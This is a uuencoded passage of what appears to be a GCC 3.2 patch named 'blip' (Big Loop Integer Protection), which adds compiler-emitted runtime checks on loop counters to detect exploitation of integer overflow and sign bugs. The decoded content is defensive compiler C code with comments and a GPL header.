+M8V]N<VED97(@:70@87,@;6]D:69I960@#0T**R`J#0T**R`J(%1H:7,@9G5N
+M8W1I;VX@:7,@<F5C=7)S:79E(&%N9"!T:&4@<W1O<"!C;VYI=&EO;B!I<R!E
+M:71H97(-#0HK("H@+2!A('-I;7!L92!E>'!R('=A<R!F;W5N9"!W:&EC:"!A
+M;&QO=R!U<R!T;R!F:6=U<F4@;W5T('1H870@#0T**R`J(`D@=&AE(&1E8VP@
+M:7,@;6]D:69I960N#0T**R`J("T@82!F=6YC=&EO;B!R96%C:"!A('-T;70@
+M+R!E>'!R('1O(&-O;7!L97@@=&\@=F5R9FEY#0T**R`J(`D@*'=E(&-A;B!C
+M:&5A="!I;B!F:7)S="!V97)S:6]N(&%N9"!C;&%I;2!T:&%T(&%L;6]S="!E
+M=F5R>71H:6YG#0T**R`J(`D@:7,@=&]O(&AA<F0@=&\@:61E;G1I9GD@<V\@
+M<F5C=7)S:79E(&5N9"!W:&EL92!S=7!P;W)T:6YG(&]N;'D@#0T**R`J(`D@
+M8F%S:6,@<W1U9F8@*2HO#0T**PT-"BL-#0HK#0T**V)O;VP-#0HK8FQI<%]D
+M96-L7VUO9&EF:65D("AD96-L+'0I#0T**PET<F5E(&1E8VP[#0T**PET<F5E
+M('0[#0T**WL-#0HK"6EN="!I.PT-"BL)=')E90EE>'`[#0T**PD-#0HK"6EF
+M*"%T*2!R971U<FX@9F%L<V4[#0T**PD-#0HK"7-W:71C:"A44D5%7T-/1$4@
+M*'0I*7L-#0HK#0T**PDO*B!H86YD;&4@:VYO=VX@<VEM<&QE(&-A<V5S('=H
+M:6-H(&ES('1Y<&EC86P@=&\@8V]U;G1E<B`-#0HK"2`J(&UO9&EF:6-A=&EO
+M;G,@*B\-#0HK"0D-#0HK"0EC87-E($U/1$E&65]%6%!2.@T-"BL)"0DO*B!O
+M;FQY('1A:V4@8V%R92!O9B!C87-E(&QI:V4@*ST@+3T@34]$24997T584%(@
+M=VAE<F4@9&5C;"`-#0HK"0D)("H@:7,@;VX@;&5F="!S:61E(&%N9"!A;'-O
+M(&]N(')I9VAT('-I9&4@=&]G871H97(@=VET:"!A(`T-"BL)"0D@*B!C;VYS
+M=&%N="`J+PT-"BL)"0EE>'`@/2!44D5%7T]015)!3D0@*'0L,2D[#0T**PD)
+M"6EF*`E44D5%7T]015)!3D0@*'0L,"D@/3T@9&5C;"`F)@T-"BL)"0D)97AP
+M("8F#0T**PD)"0E44D5%7T]015)!3D0@*&5X<"PP*2`]/2!D96-L("8F#0T*
+M*PD)"0E44D5%7T]015)!3D0@*&5X<"PQ*2`F)@T-"BL)"0D)5%)%15]#3TY3
+M5$%.5"`H5%)%15]/4$5204Y$("AE>'`L,2DI*7L-#0HK#0T**PT-"BL)"0D)
+M:68H5%)%15]#3T1%("AE>'`I(#T](%!,55-?15A04BE[#0T**PD)"0D);&]O
+M<%]L:6UI="YD:7(@/2!)3D-214U%3E0[#0T**PD)"0D)<F5T=7)N('1R=64[
+M#0T**PD)"0E]#0T**PD)"0D-#0HK"0D)"6EF*%12145?0T]$12`H97AP*2`]
+M/2!-24Y54U]%6%!2*7L-#0HK"0D)"0EL;V]P7VQI;6ET+F1I<B`]($1%0U)%
+M345.5#L-#0HK"0D)"0ER971U<FX@=')U93L-#0HK"0D)"7T-#0HK#0T**PD)
+M"0ER971U<FX@=')U93L-#0HK"0D)?0T-"BL)"0EE;'-E#0T**PD)"0ER971U
+M<FX@9F%L<V4[#0T**PT-"BL)"0D-#0HK"0EC87-E(%!214E.0U)%345.5%]%
+M6%!2.@T-"BL)"6-A<V4@4$]35$E.0U)%345.5%]%6%!2.@T-"BL)"0T-"BL)
+M"0EI9BAD96-L(#T](%12145?3U!%4D%.1"`H="PP*2E[#0T**PD)"0EL;V]P
+M7VQI;6ET+F1I<B`]($E.0U)%345.5#L-#0HK"0D)"7)E='5R;B!T<G5E.PT-
+M"BL)"0E]#0T**PD)"0T-"BL)"0EB<F5A:SL-#0HK#0T**PD)8V%S92!03U-4
+M1$5#4D5-14Y47T584%(Z#0T**PD)8V%S92!04D5$14-214U%3E1?15A04CH-
+M#0HK"0D)#0T**PD)"0T-"BL)"0EI9BAD96-L(#T](%12145?3U!%4D%.1"`H
+M="PP*2E[#0T**PD)"0EL;V]P7VQI;6ET+F1I<B`]($1%0U)%345.5#L-#0HK
+M"0D)"7)E='5R;B!T<G5E.PT-"BL)"0E]#0T**PD)"0T-"BL)"0EB<F5A:SL-
+M#0HK#0T**PD)8V%S92!,5%]%6%!2.@T-"BL)"6-A<V4@3$5?15A04CH-#0HK
+M"0EC87-E($=%7T584%(Z#0T**PD)8V%S92!'5%]%6%!2.@T-"BL)"6-A<V4@
+M15%?15A04CH-#0HK"0EC87-E($Y%7T584%(Z#0T**PT-"BL)"0DO*B!I;B!T
+M:&4@8V%S92!O9B!S:6UP;&4@8V]N9&ET:6]N+"!C:&5C:R!F;W(@;6]D:69I
+M8V%T:6]N(&]F#0T**PD)"2`J(&]N92!O9B!T:&4@<VED97,N(%1H:7,@=VEL
+M;"!H96QP('5S(&EN(&-A<V5S(&QI:V4@#0T**PD)"2`J('=H:6QE*&QE;BTM
+M*2`J+PT-"BL-#0HK"0D)9F]R*&D],#MI(#P@,CL@:2LK*7L-#0HK#0T**PD)
+M"0EI9BAB;&EP7V1E8VQ?;6]D:69I960H9&5C;"`L(%12145?3U!%4D%.1"AT
+M+&DI*2D-#0HK"0D)"0ER971U<FX@=')U93L-#0HK"0D)?0T-"BL-#0HK"0D)
+M<F5T=7)N(&9A;'-E.PT-"BL-#0HK"0D)#0T**PD)9&5F875L=#H-#0HK"0D)
+M<F5T=7)N(&9A;'-E.PT-"BL)"0T-"BL)?0T-"BL-#0HK"7)E='5R;B!F86QS
+M93L)#0T**WT-#0HK#0T**R\J(&9I;F0@82!D96-L(&]U="!O9B!P87)E;G0@
+M97AP<B!O<&5R86YD+B!M;W-T('-I;7!L92!C87-E(&ES('=H96X-#0HK("H@
+M;W`@:7,@=&AE(&1E8VP@:71S96QF+B!A;F]T:&5R('-U<'!O<G1E9"!C87-E
+M(&ES('=H96X@=&AE(&]P(&ES(&$-#0HK("H@;6]D:69Y(&]R(&EN8W)E;65N
+M="`O(&1E8W)E;65N="!E>'!R+"!I;B!T:&ES(&-A<V4@=&AE(&9I<G-T(&]P
+M97)A;F0-#0HK("H@=VEL;"!B92!T:&4@;&]O:V5D(&9O<B!D96-L+B`-#0HK
+M("H-#0HK("H@:6X@8V%S97,@;W1H97(@=&AE;B!T:&]S92P@=V4@=VEL;"!N
+M;W0@9FEN9"!T:&4@9&5C;"X@*B\-#0HK#0T**W1R964-#0HK8FQI<%]F:6YD
+M7V1E8VPH;W`I#0T**PET<F5E(&]P.PT-"BM[#0T**PT-"BL)<W=I=&-H*"!4
+M4D5%7T-/1$4H;W`I*7L-#0HK"0EC87-E(%9!4E]$14-,.@T-"BL)"6-A<V4@
+M4$%235]$14-,.@T-"BL)"6-A<V4@1DE%3$1?1$5#3#H-#0HK"0EC87-E($E.
+M5$5'15)?0U-4.@T-"BL-#0HK"0D)<F5T=7)N(&]P.PT-"BL)"0D-#0HK"0DO
+M*B!I9B!S:6UP;&4@97AP<B!L;V]K(&EN<VED92XJ+PT-"BL)"6-A<V4@4%)%
+M1$5#4D5-14Y47T584%(Z#0T**PD)8V%S92!04D5)3D-214U%3E1?15A04CH-
+M#0HK"0EC87-E(%!/4U1$14-214U%3E1?15A04CH-#0HK"0EC87-E(%!/4U1)
+M3D-214U%3E1?15A04CH-#0HK#0T**PD)"7)E='5R;B!B;&EP7V9I;F1?9&5C
+M;"A44D5%7T]015)!3D0@*&]P+#`I*3L-#0HK"0D)#0T**PD)+RH@:6X@8V%S
+M92!L;V]P('9A<B!N965D(&-O;G9E<G1I;VXL('=E('=I;&P@9FEN9"!S;VUE
+M(`T-"BL)"2`J(&YO<"!E>'!R97-S:6]N<R`J+PT-"BL)"6-A<V4@3D]07T58
+M4%(Z#0T**PD)8V%S92!#3TY615)47T584%(Z#0T**PD)"0T-"BL)"0ER971U
+M<FX@8FQI<%]F:6YD7V1E8VPH5%)%15]/4$5204Y$("AO<"PP*2D[#0T**PD)
+M#0T**PD)9&5F875L=#H-#0HK"0D)<F5T=7)N($Y53$P[#0T**PE]#0T**WT-
+M#0HK#0T**R\J(&QO;VL@:6YS:61E(&$@0T%,3%]%6%!2+"!A;F0@9FEN9"!T
+M:&4@9G5N8W1I;VX@;F%M92X@=&AE;B!S96%R8V@@#0T**R`J(&9U;F-T:6]N
+M(&YA;64@:6X@8FQI<"!L:7-T+"!A;F0@8W)E871E(&$@(FQO;W!?;&EM:70B
+M('-T=7)C="!U<VEN9PT-"BL@*B!T:&4@3BUT:"!P87)A;2!A<R!L:6UI="P@
+M8V]N<W1A;G0@,"!A<R!C;W5N=&5R+"!A;F0@<V5T(&1I<F5C=&EO;B`-#0HK
+M("H@=&\@:6YC<F5M96YT+B`J+PT-"BMB;V]L#0T**V)L:7!?9FEN9%]C86QL
+M7VQI;6ET<RAC86QL+'!A<F%M<RD-#0HK"71R964)8V%L;#L-#0HK"71R964)
+M<&%R86US.PT-"BM[#0T**PT-"BL)=')E90EF=6YC7V1E8VPL<&%R86T[#0T*
+M*PEI;G0)"6DL<&%R86U?:6YD97@]+3$[#0T**PT-"BL)+RH@=7!D871E('-T
+M871I<W1I8W,@8V]U;G1E<G,@*B\-#0HK"6)L:7!?<W1A="YT;W1A;%]C:&5C
+M:W,K*SL-#0HK"6)L:7!?<W1A="YC86QL7V-H96-K<RLK.PT-"BL)#0T**PEI
+M9B@A8V%L;"!\?`T-"BL)"2%44D5%7T]015)!3D0H8V%L;"PP*7Q\#0T**PD)
+M5%)%15]#3T1%("A44D5%7T]015)!3D0@*&-A;&PL,"DI("$]($%$1%)?15A0
+M4B!\?`T-"BL)"2%44D5%7T]015)!3D0H5%)%15]/4$5204Y$("AC86QL+#`I
+M+#`I*7L-#0HK"0D-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#H@
+M8V%L;"!E>'!R(&1O;G0@:&%V92!A9&1R97-S(&5X<'(B*3L)#0T**PD)<F5T
+M=7)N(&9A;'-E.PT-"BL)?0T-"BL-#0HK"69U;F-?9&5C;"`](%12145?3U!%
+M4D%.1"`H5%)%15]/4$5204Y$("AC86QL+#`I+#`I.PT-"BL):68H(%12145?
+M0T]$12`H9G5N8U]D96-L*2`A/2!&54Y#5$E/3E]$14-,('Q\#0T**PD)(41%
+M0TQ?3D%-12`H9G5N8U]D96-L*2!\?`T-"BL)"2$@241%3E1)1DE%4E]03TE.
+M5$52("@@1$5#3%].04U%*&9U;F-?9&5C;"DI*7L-#0HK#0T**PD)8FQI<%]W
+M87)N:6YG*$Y%7T-!3$PL(F)L:7`Z(&-A;&P@8GD@<&]I;G1E<B!T;R!F=6YC
+M=&EO;B!N;W0@<W5P<&]R=&5D(BD[#0T**PD@("`)<F5T=7)N(&9A;'-E.PT-
+M"BL)?0T-"BL-#0HK#0T**PEF;W(H:3TP.R!S=')L96XH;&]O<%]L:6ME<UMI
+M72YF=6YC7VYA;64I(#X@,#MI*RLI>PT-"BL)"6EF*'-T<F-M<"A)1$5.5$E&
+M24527U!/24Y415(@*$1%0TQ?3D%-12`H9G5N8U]D96-L*2DL#0T**PD)"0D)
+M;&]O<%]L:6ME<UMI72YF=6YC7VYA;64I/3TP*7L-#0HK"0D)#0T**PD)"7!A
+M<F%M7VEN9&5X(#T@;&]O<%]L:6ME<UMI72YP87)A;5]I;F1E>#L-#0HK"0D)
+M8G)E86L[#0T**PD)?0T-"BL)?0T-"BL)#0T**PDO*B!I9B!F=6YC=&EO;B!N
+M;W0@9F]U;F0@:6X@;&]O<%]L:6ME<R!L:7-T('1H96X@9&]N="!C;W5N=`T-
+M"BL)("H@:70@:6X@=&AE(&)L:7!?<W1A="`J+PT-"BL):68H<&%R86U?:6YD
+M97@@/"`P*7L-#0HK"0EB;&EP7W-T870N=&]T86Q?8VAE8VMS+2T[#0T**PD)
+M8FQI<%]S=&%T+F-A;&Q?8VAE8VMS+2T[#0T**PD)<F5T=7)N(&9A;'-E.PT-
+M"BL)?0T-"BL)"0D-#0HK#0T**PEP87)A;2`]('!A<F%M<SL-#0HK"69O<BAI
+M/3`[(&D@/"!P87)A;5]I;F1E>"`F)B!P87)A;3L@:2LK*7L-#0HK"0EP87)A
+M;2`](%12145?0TA!24X@*'!A<F%M*3L-#0HK"7T-#0HK"0T-"BL):68H(7!A
+M<F%M*2!R971U<FX@9F%L<V4[#0T**PD-#0HK"6QO;W!?;&EM:70N;&EM:70@
+M/2!44D5%7U9!3%5%("AP87)A;2D[#0T**PT-"BL)+RH@:68@<&%R86T@:7,@
+M8V%L8W5L871E9"!U<VEN9R!A(&9U;F-T:6]N+"!D;VYT(&EN8VQU9&4@=&AA
+M=`T-"BL)("H@97AP<B!I;B!T:&4@8VAE8VLL(&ET<R!W87D@=&]O(')I<VMY
+M+B`J+PT-"BL):68H5%)%15]3241%7T5&1D5#5%,@*&QO;W!?;&EM:70N;&EM
+M:70I*7L-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#H@<&%R86T@
+M<V5E;7,@=&\@:&%V92!S:61E(&5F9F5C=',B*3L-#0HK"0ER971U<FX@9F%L
+M<V4["0D-#0HK"7T-#0HK"0T-"BL);&]O<%]L:6UI="YC;W5N=&5R(#T@:6YT
+M96=E<E]Z97)O7VYO9&4[#0T**R`@"6QO;W!?;&EM:70N9&ER(#T@24Y#4D5-
+M14Y4.PD-#0HK"0T-"BL)+RH@86QL('-E96US('1O(&)E(&]K+"!W92!F;W5N
+M9"!T:&4@;&EM:71S+"!A;F0@=V4@8V%N(`T-"BL)("H@8V]N=&EN=64@=VET
+M:"!E;6ET:6<@=&AE(&)L:7`@8VAE8VLN("HO#0T**PD-#0HK"7)E='5R;B!T
+M<G5E.PT-"BM]#0T**PT-"BL-#0HK+RH@3&]O:R!I;G-I9&4@82!L;V]P(&-O
+M;F1I=&EO;BX@9FER<W0@8VAE8VL@:68@8V]N9&ET:6]N(&ES('1O;R`-#0HK
+M("H@8V]M<&QI8V%T960N(&EF(&ET(&ES+"!R971U<FX@3E5,3"`O+R!&25A-
+M12!R961U8V4@(F-O;7!L:6-A=&5D(B!S970-#0HK("H-#0HK("H@9F]R(&5A
+M8V@@9&5C;"!I;B!T:&4@8V]N9&ET:6]N+"!C:&5C:R!I9B!D96-L(&ES(&UO
+M9&EF:65D(&5I=&AE<@T-"BL@*B!I;B!C;VYD(&]R(&5X<'(N(&EF(&ET)W,@
+M;6]D:69I960@8V]N<VED97(@:70@87,@=&AE(&-O=6YT97(N#0T**R`J(&EF
+M(&UO<F4@=&AE;B!O;F4@8V]U;G1E<B!F;W5N9"!R971U<FX@3E5,3"X@*B\-
+M#0HK#0T**V)O;VP-#0HK8FQI<%]F:6YD7VQO;W!?=F%R<RAC;VYD+&5X<'(I
+M#0T**PET<F5E"6-O;F0[#0T**PET<F5E"65X<'([#0T**WL-#0HK#0T**PET
+M<F5E"61E8VP],#L-#0HK"6EN=`D):2QN=6U?;6]D:69I960],#L-#0HK#0T*
+M*PEI9B@A8V]N9"D@<F5T=7)N(&9A;'-E.PT-"BL)#0T**PDO*B!F:7)S="!V
+M97)S:6]N('=I;&P@<W5P<&]R="!O;FQY('9E<GD@<VEM<&QE(&-O;F1I=&EO
+M;G,@*B\)#0T**PES=VET8V@H5%)%15]#3T1%("AC;VYD*2E[#0T**PD)8V%S
+M92!,5%]%6%!2.@T-"BL)"6-A<V4@3$5?15A04CH-#0HK"0EC87-E($=%7T58
+M4%(Z#0T**PD)8V%S92!'5%]%6%!2.@T-"BL)"6-A<V4@15%?15A04CH-#0HK
+M"0EC87-E($Y%7T584%(Z#0T**PT-"BL)"0DO*B!F:6YD(&1E8VP@=VEL;"!G
+M970@86X@;W!E<F%N9"!A;F0@<F5T=7)N('1H92`B;6%I;B(-#0HK"0D)("H@
+M9&5C;"!T:&%T(')E<')E<W0@:70N(`T-"BL)"0D@*B`-#0HK"0D)("H@4VEN
+M8V4@=&AI<R!O<&5R86YD(&ES('!A<G0@;V8@=VAA="!W92!H;W!E(&$@8V]U
+M;G1E<@T-"BL)"0D@*B!C;VYD:71I;VXL(&ET<R!G;VEN9R!T;R!B92!E:71H
+M97(@=F%R+W!A<F%M(&1E8VP@;W(@#0T**PD)"2`J(&%N(&5X<'(@=VAI8V@@
+M;W5R(')E<75E<W1E9"!D96-L(&ES('!A<G0@;V8N("HO#0T**PD)#0T**PT-
+M"BL)"0EF;W(H:3TP.R!I(#P@,CL@:2LK*7L-#0HK"0D-#0HK"0D)"61E8VP@
+M/2!B;&EP7V9I;F1?9&5C;"A44D5%7T]015)!3D0@*&-O;F0L:2DI.PD)"0T-
+M"BL)"0D):68H(61E8VPI>PT-"BL)"0D)"6)L:7!?=V%R;FEN9RA314Q&7T-(
+M14-++`T-"BL)"0D)"0D)(F)L:7`Z(&-A;G0@9FEN9"!L;V]P(&1E8VP@:6X@
+M8V]N9&ET:6]N(BD[#0T**PD)"0D)+RH@8V]N9&ET:6]N('1O;R!C;VUP;&5X
+M+"!R971U<FX@*B\-#0HK"0D)"0ER971U<FX@9F%L<V4[#0T**PD)"0E]#0T*
+M*PT-"BL)"0D)+RH@8VAE8VL@:68@9&5C;"!I<R!M;V1I9FEE9"X@=V4@:&]P
+M92!T;R!G970@80T-"BL)"0D)("H@;6]D:69I8V%T:6]N('-U8V@@87,@:6YC
+M<F5M96YT(&]R(&1E8W)E;65N=`T-"BL)"0D)("H@<VEN8V4@=V4@:&%V92!T
+M;R!K;F]W('1H92!L;V]P(&1I<F5C=&EO;B`J+PT-"BL)"0D):68H*&)L:7!?
+M9&5C;%]M;V1I9FEE9"AD96-L+&-O;F0I('Q\#0T**PD)"0D)(&)L:7!?9&5C
+M;%]M;V1I9FEE9"AD96-L+&5X<'(I*2E[#0T**PD)"0D)#0T**PD)"0D);G5M
+M7VUO9&EF:65D*RL[#0T**PD)"0D);&]O<%]L:6UI="YC;W5N=&5R(#T@9&5C
+M;#L-#0HK"0D)#0T**PD)"0D)#0T**PD)"0E]#0T**PD)"0DO*B!I9B!N;W0@
+M;6]D:69I960@;6%Y8F4@:71S('1H92!L:6UI="`N<V%V92!I="`-#0HK"0D)
+M"2`J(&EN(&-A<V4@=&AA="!W92!W:6QL(&9I;F0@;W1H97(@87,@8V]U;G1E
+M<B`J+PT-"BL)"0D)96QS97L-#0HK"0D)"0EL;V]P7VQI;6ET+FQI;6ET(#T@
+M9&5C;#L-#0HK"0D)"7T-#0HK"0D)?0D-#0HK"0D)#0T**PD)"6EF*&YU;5]M
+M;V1I9FEE9"`]/2`Q*7L-#0HK"0D)"7)E='5R;B!T<G5E.PT-"BL)"0E]#0T*
+M*PD)"0T-"BL)"0DO*B!W92!D:61N="!F;W5N9"!O;F4@*&%N9"!O;FQY(&]N
+M92D@;6]D:69I960@9&5C;"X@#0T**PD)"2`J('-O('=E(&1O;G0@:VYO=R!W
+M:&EC:"!I<R!T:&4@;&EM:70@*&EF(&%T(&%L;"!E>&ES="D@*B\-#0HK"0D)
+M:68H;G5M7VUO9&EF:65D(#T](#`I>PT-"BL)"0D)8FQI<%]W87)N:6YG*%-%
+M3$9?0TA%0TLL#0T**PD)"0D)(F)L:7`Z('=H:6-H(&QO;W`@=F%R(&ES(&UO
+M9&EF:65D/R`H8F]D>2!N;W0@<V5A<F-H960I(BD[#0T**PD)"7T-#0HK"0D)
+M96QS97L-#0HK"0D)"6)L:7!?=V%R;FEN9RA314Q&7T-(14-++`T-"BL)"0D)
+M"2)B;&EP.B!M;W)E('1H96X@;VYE('9A<B!I<R!M;V1I9FEE9"P@=VAO(&ES
+M(&-O=6YT97(_(BD[#0T**PD)"0D-#0HK"0D)?0T-"BL)"0ER971U<FX@9F%L
+M<V4[#0T**PD)"0T-"BL)"0T-"BL)"61E9F%U;'0Z#0T**PD)"6)L:7!?=V%R
+M;FEN9RA314Q&7T-(14-++`T-"BL)"0D)"2)B;&EP.B!C;VYD:71I;VX@:7,@
+M=&]O(&-O;7!L97@@9F]R('1H:7,@=F5R<VEO;B(I.PT-"BL)"0ER971U<FX@
+M9F%L<V4[#0T**PE]#0T**PD-#0HK?0T-"BL-#0HK#0T**R\J(&-H96-K(&9O
+M<B!L;V]P(&QI;6ET<RX@:68@;&]O<"!S965M<R!T;R!B92!A(&-O=6YT(&QO
+M;W`L(`T-"BL@*B!E;6ET(&-O9&4@=&\@8VAE8VL@;&]O<"!C;W5N=&5R(&EN
+M(')U;BUT:6UE+B!T:&%T(&-O9&4@=VEL;`T-"BL@*B!M86ME('-U<F4@=&AE
+M(&-O=6YT97(@:7,@;F]T('1O;R!B:6<@*&%S(')E<W5L="!O9B!I;G0@;W9E
+M<F9L;W<-#0HK("H@97AP;&]I=&%T:6]N*2`J+PT-"BL-#0HK("`@#0T**W1R
+M964-#0HK8FQI<%]C:&5C:U]L;V]P7VQI;6ET("AT*0T-"BL@("`@('1R964@
+M=#L-#0HK>PT-"BL)+RH@3&]O<"!P87)T<R`J+PT-"BL)=')E90ER97-U;'0]
+M=#L-#0HK#0T**PDO*B!)9B!W92!A<F4@;F]T(&%S:V5D('1O(&)L:7`L(')E
+M='5R;B!T:&4@=')E92!W92!G;W0@*B\-#0HK"6EF*"%F;&%G7V)L:7`I(')E
+M='5R;B!R97-U;'0[#0T**PT-"BL)+RH@268@=&AE('1R964@=V4@9V]T(&ES
+M(&YU;&P@=&AE;B!W92!C86YT(&1O(&UU8V@@*B\-#0HK"6EF*"%T*0ER971U
+M<FX@<F5S=6QT.PT-"BL-#0HK"2\J(&EN:71I86QI>F4@;&]O<%]L:6UI="!G
+M;&]B86P@*B\-#0HK"6QO;W!?;&EM:70N<W1M="`]('0[#0T**PEL;V]P7VQI
+M;6ET+F-O=6YT97(@/2!.54Q,.PT-"BL);&]O<%]L:6UI="YL:6UI="`]($Y5
+M3$P[#0T**PEL;V]P7VQI;6ET+F1I<B`](%5.2TY/5TX[#0T**PT-"BL-#0HK
+M"0T-"BL)#0T**PES=VET8V@H5%)%15]#3T1%("AT*2E[#0T**PD-#0HK"2\J
+M(&1E<&5N9&EN9R!O9B!L;V]P('1Y<&4L(&5X=')A8W0@=&AE(&QO;W`@<W1M
+M=',@86YD(&5X<')S#0T**PD@*B!L;V]P(&-O;F1I=&EO;B!W:6QL(&AE;'`@
+M=7,@:61E;G1I9GD@=&AE(&QO;W`@8V]U;G1E<B!V87(-#0HK"2`J('=E('=I
+M;&P@;&%T97(@;&]O:R!I;B!C;VYD(&ET<V5L9B!A;F0@=&AE(&9O<E]E>'!R
+M(&9O<B`-#0HK"2`J(&UO9&EF:6-A=&EO;B!O9B!V87)S(&]F(&-O;F1I=&EO
+M;BX@#0T**PD@*@T-"BL)("H@:68@;6]D:69I8V%T:6]N(&9O=6YD(&%N9"!L
+M;V]K(&QI:V4@82`B8V]U;G0B(&UO9&EF:6-A=&EO;B`-#0HK"2`J("AI+F4N
+M("LK+"TM+"L]+"H]+BX@971C*2!W92!W:6QL(&MN;W<@:71S(&$@(F-O=6YT
+M(B!L;V]P+@T-"BL)("H@"0T-"BL)("H@;F5X="!S=&5P+"!I<R!T;R!I9&5N
+M=&EF>2!C;VYD:71I;VX@97AP<F5S:6]N+B!A;F0@=&\@96UI=`T-"BL)("H@
+M8V]D92!T;R!C:&5C:R!L:6UI="!I;B!R=6YT:6UE+"!B969O<F4@;&]O<"!S
+M=&%R="!E>&5U8W1I;VX@("HO#0T**PT-"BL)8V%S92!&3U)?4U1-5#H-#0HK
+M"0EB;&EP7W-T870N9F]R7V-H96-K<RLK.PT-"BL)"6)L:7!?<W1A="YT;W1A
+M;%]C:&5C:W,K*SL-#0HK"0D)#0T**PD):68H8FQI<%]F:6YD7VQO;W!?=F%R
+M<RA&3U)?0T].1"`H="DL1D]27T584%(@*'0I*2D-#0HK"0D):68H8FQI<%]E
+M;6ET7V9O<E]L;V]P7V-H96-K<RAT*2E[#0T**PD)"0EB;&EP7W-T870N=&]T
+M86Q?96UI=',K*SL-#0HK"0D)"6)L:7!?<W1A="YF;W)?96UI=',K*SL-#0HK
+M"0D)?0T-"BL-#0HK"0EB<F5A:SL-#0HK"6-A<V4@5TA)3$5?4U1-5#H-#0HK
+M"0EB;&EP7W-T870N=VAI;&5?8VAE8VMS*RL[#0T**PD)8FQI<%]S=&%T+G1O
+M=&%L7V-H96-K<RLK.PT-"BL-#0HK"0EI9BAB;&EP7V9I;F1?;&]O<%]V87)S
+M*%=(24Q%7T-/3D0@*'0I+$Y53$Q?5%)%12DI#0T**PD)"6EF*&)L:7!?96UI
+M=%]W:&EL95]L;V]P7V-H96-K<R@I*7L-#0HK"0D)"6)L:7!?<W1A="YT;W1A
+M;%]E;6ET<RLK.PT-"BL)"0D)8FQI<%]S=&%T+G=H:6QE7V5M:71S*RL[#0T*
+M*PD)"7T-#0HK"0T-"BL)"6)R96%K.PT-"BL)8V%S92!#04Q,7T584%(Z#0T*
+M*PD)#0T**PD):68H8FQI<%]F:6YD7V-A;&Q?;&EM:71S*'0L5%)%15]/4$52
+M04Y$("AT+#$I*2D-#0HK"0D)<F5S=6QT(#T@8FQI<%]E;6ET7V-A;&Q?8VAE
+M8VMS*'0I.PD)#0T**PT-"BL)"6EF*')E<W5L="`A/2!T*7L-#0HK"0D)8FQI
+M<%]S=&%T+G1O=&%L7V5M:71S*RL[#0T**PD)"6)L:7!?<W1A="YC86QL7V5M
+M:71S*RL[#0T**PD)?0T-"BL)"0T-"BL)"6)R96%K.PD-#0HK"61E9F%U;'0Z
+M#0T**PD)<F5T=7)N(')E<W5L=#L-#0HK"7T-#0HK#0T**PER971U<FX@<F5S
+M=6QT.PT-"BL)#0T**WT-#0ID:69F("U.=7(@9V-C+3,N,B]G8V,O8FQI<"YH
+M(&=C8RTS+C(M8FQI<"]G8V,O8FQI<"YH#0HM+2T@9V-C+3,N,B]G8V,O8FQI
+M<"YH"5=E9"!$96,@,S$@,38Z,#`Z,#`@,3DV.0T**RLK(&=C8RTS+C(M8FQI
+M<"]G8V,O8FQI<"YH"4UO;B!$96,@(#(@,3DZ-#(Z,SD@,C`P,@T*0$`@+3`L
+M,"`K,2PY.2!`0`T**R\J#0HK#0HK"4)I9R!,;V]P($EN=&5G97(@4')O=&5C
+M=&EO;B`M($$N2RY!(")B;&EP(@T**PT**PEB;&EP(&ES(&$@<&%T8V@@9F]R
+M('1H92!G8V,@8V]M<&EL97(L('=H:6-H(&1E=&5C="!T:&4@97AP;&]I=&%T
+M:6]N#0HK"6]F("AP=6)L:6-L>2D@=6YK;F]W;B!I;G1E9V5R(&]V97)F;&]W
+M(&%N9"!S:6=N('9U;&YE<F%B:6QI=&EE<RX-"BL-"BL@("`-"BM4:&ES(&9I
+M;&4@:7,@<&%R="!O9B!'3E4@0T,N#0HK#0HK1TY5($-#(&ES(&9R964@<V]F
+M='=A<F4[('EO=2!C86X@<F5D:7-T<FEB=71E(&ET(&%N9"]O<B!M;V1I9GD-
+M"BMI="!U;F1E<B!T:&4@=&5R;7,@;V8@=&AE($=.52!'96YE<F%L(%!U8FQI
+M8R!,:6-E;G-E(&%S('!U8FQI<VAE9"!B>0T**W1H92!&<F5E(%-O9G1W87)E
+M($9O=6YD871I;VX[(&5I=&AE<B!V97)S:6]N(#(L(&]R("AA="!Y;W5R(&]P
+M=&EO;BD-"BMA;GD@;&%T97(@=F5R<VEO;BX-"BL-"BM'3E4@0T,@:7,@9&ES
+M=')I8G5T960@:6X@=&AE(&AO<&4@=&AA="!I="!W:6QL(&)E('5S969U;"P-
+M"BL)8G5T(%=)5$A/550@04Y9(%=!4E)!3E19.R!W:71H;W5T(&5V96X@=&AE
+M(&EM<&QI960@=V%R<F%N='D@;V8-"BL)34520TA!3E1!0DE,2519(&]R($9)
+M5$Y%4U,@1D]2($$@4$%25$E#54Q!4B!055)03U-%+B`@4V5E('1H90T**PE'
+M3E4@1V5N97)A;"!0=6)L:6,@3&EC96YS92!F;W(@;6]R92!D971A:6QS+@T*
+M*PT**PE9;W4@<VAO=6QD(&AA=F4@<F5C96EV960@82!C;W!Y(&]F('1H92!'
+M3E4@1V5N97)A;"!0=6)L:6,@3&EC96YS90T**PEA;&]N9R!W:71H($=.52!#
+M0SL@<V5E('1H92!F:6QE($-/4%E)3D<N("!)9B!N;W0L('=R:71E('1O#0HK
+M"71H92!&<F5E(%-O9G1W87)E($9O=6YD871I;VXL(#4Y(%1E;7!L92!0;&%C
+M92`M(%-U:71E(#,S,"P-"BL)0F]S=&]N+"!-02`P,C$Q,2TQ,S`W+"!54T$N
+M("`J+PT**PT**R-D969I;F4@0DQ)4%]-05@),'@Q,#`P,#`P,"`O*B`R-38@
+M34(@<V5E;7,@=V%Y('1O;R!M=6-H(&)I9R!L;V]P+BXN*B\-"BL-"BMT>7!E
+M9&5F(&5N=6T@;&]O<%]D:7(-"BM[#0HK"55.2TY/5TY?1$E2+"\J('=E(&-A
+M;FYO="!T96QL(&QO;W`@9&ER96-T:6]N("HO#0HK"4E.0U)%345.5"P)+RH@
+M;&]O<"!I<R!G;VEN9R!U<"`J+PT**PE$14-214U%3E0)+RH@;&]O<"!I<R!G
+M;VEN9R!D;W=N("HO#0HK?0T**VQO;W!?9&ER.PT**PT**W1Y<&5D968@96YU
+M;2!B;&EP7W=A<FYI;F=S#0HK>PT**PE314Q&7T-(14-++`DO*B!U<VEN9R!T
+M:&4@5%)%12!O8FIE8W0@9FEN9"!O=70@=&AE(')I9VAT#0HK"0D)"2`@('=A
